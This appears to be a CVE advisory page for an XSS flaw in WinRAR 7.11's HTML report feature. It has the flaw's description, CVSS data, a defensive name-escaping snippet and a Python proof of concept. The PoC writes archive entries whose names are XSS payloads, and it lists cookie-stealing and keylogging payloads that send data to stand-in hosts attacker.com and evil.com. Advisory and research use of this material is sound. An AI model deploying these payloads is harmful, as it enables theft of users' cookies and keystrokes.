Security Vulnerability Report
CVE-2025-52331 CVSS 6.1 MEDIUM

Published: 2025-11-12 17:15:38
Last Modified: 2025-12-31 16:39:47

Description

Cross-site scripting (XSS) vulnerability in the generate report functionality in Rarlab WinRAR 7.11 allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names in the HTML report without validation, which allows potentially malicious HTML tags to be injected into the report. User interaction is required: the user must use the "generate report" functionality and open the report.
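The check and the output encoding that close this class of bug, as an added example (not WinRAR's code and not from the referenced advisory): it flags archive entry names containing HTML-significant characters and escapes them before they are written into a report. The table layout, function names and sample archive are assumptions constructed for illustration.

```python
import html
import io
import re
import zipfile

# Characters that change meaning when written into HTML text or attributes.
HTML_SIGNIFICANT = re.compile(r"[<>&\"']")


def build_sample_archive() -> bytes:
    """Constructed sample: in-memory ZIP with one plain and two markup-bearing names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in ("notes.txt", "draft <b>final.txt", 'a&b "v2".txt'):
            zf.writestr(name, "sample")
    return buf.getvalue()


def flag_entry_names(archive_bytes: bytes) -> list[str]:
    """Return entry names that contain HTML-significant characters."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return [n for n in zf.namelist() if HTML_SIGNIFICANT.search(n)]


def render_report(archive_bytes: bytes, escape: bool = True) -> str:
    """Render a minimal HTML listing (hypothetical layout).

    escape=False reproduces the unvalidated behaviour the description names;
    escape=True encodes every name so it is displayed as text, never parsed as markup.
    """
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        names = zf.namelist()
    rows = []
    for n in names:
        cell = html.escape(n, quote=True) if escape else n
        rows.append(f"<tr><td>{cell}</td></tr>")
    return "<table>\n" + "\n".join(rows) + "\n</table>"


if __name__ == "__main__":
    data = build_sample_archive()
    print("flagged:", flag_entry_names(data))
    print(render_report(data))
```

The flagging function can also run as a triage step over received archives before anyone generates or opens a report from them.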

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:rarlab:winrar:7.11:-:*:*:*:*:*:* - VULNERABLE
Rarlab WinRAR 7.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-52331 PoC - WinRAR 7.11 XSS in Generate Report
# This PoC demonstrates the XSS vulnerability in WinRAR's report generation
import zipfile
import os


def create_malicious_rar():
    """
    Create a malicious archive file that contains XSS payloads in filenames
    """
    malicious_filenames = [
        '<img src=x onerror=fetch(`https://attacker.com/?c=${document.cookie}`)>.txt',
        '<script>new Image().src=`https://attacker.com/?u=${window.location.href}&n=${navigator.userAgent}`</script>',
        '<svg/onload=fetch(`https://attacker.com/?i=${document.domain}`)>',
        '<iframe src="javascript:fetch(`https://attacker.com/?data=${btoa(document.body.innerHTML)}`)">'
    ]

    # Create a ZIP file (WinRAR can open ZIP files)
    with zipfile.ZipFile('malicious_archive.zip', 'w') as zipf:
        for i, filename in enumerate(malicious_filenames):
            # Add a file with the malicious filename
            content = f'Normal file content {i}'
            zipf.writestr(filename, content)

    print('[+] Created malicious_archive.zip with XSS payloads in filenames')
    print('[+] When user generates report and opens HTML, XSS will execute')


def generate_xss_payload():
    """
    Generate various XSS payloads for testing
    """
    payloads = {
        'cookie_stealer': '<img src=x onerror="fetch(`https://evil.com/?c=${document.cookie}`)">',
        'info_disclosure': '<script>fetch(`https://evil.com/?u=${navigator.userAgent}&h=${window.location.href}`)</script>',
        'dom_manipulation': '<svg/onload="document.body.innerHTML=`<h1>Hacked</h1>`">',
        'keylogger': '<script>document.onkeypress=function(e){fetch(`https://evil.com/k?${e.key}`)}</script>'
    }
    return payloads


if __name__ == '__main__':
    print('CVE-2025-52331 WinRAR XSS PoC')
    print('=' * 50)
    create_malicious_rar()
    print('\n[!] User must:')
    print(' 1. Open the malicious archive with WinRAR 7.11')
    print(' 2. Use "Generate Report" feature')
    print(' 3. Open the generated HTML report')
    print(' 4. XSS payload will execute in browser context')
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52331", "sourceIdentifier": "[email protected]", "published": "2025-11-12T17:15:37.733", "lastModified": "2025-12-31T16:39:46.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names without validation in the HTML report, which allows potentially malicious HTML tags to be injected into the report. User interaction is required. User must use the \"generate report\" functionality and open the report."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rarlab:winrar:7.11:-:*:*:*:*:*:*", "matchCriteriaId": "7495FB0B-8BAF-453A-BC8A-9056BF2E98FF"}]}]}], "references": [{"url": "https://gist.github.com/MarcinB44/2150484497c4b34aedf682c9091b14fa", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.rarlab.com/rarnew.htm", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.win-rar.com/whatsnew.html", "source": "[email protected]", "tags": ["Release Notes"]}]}}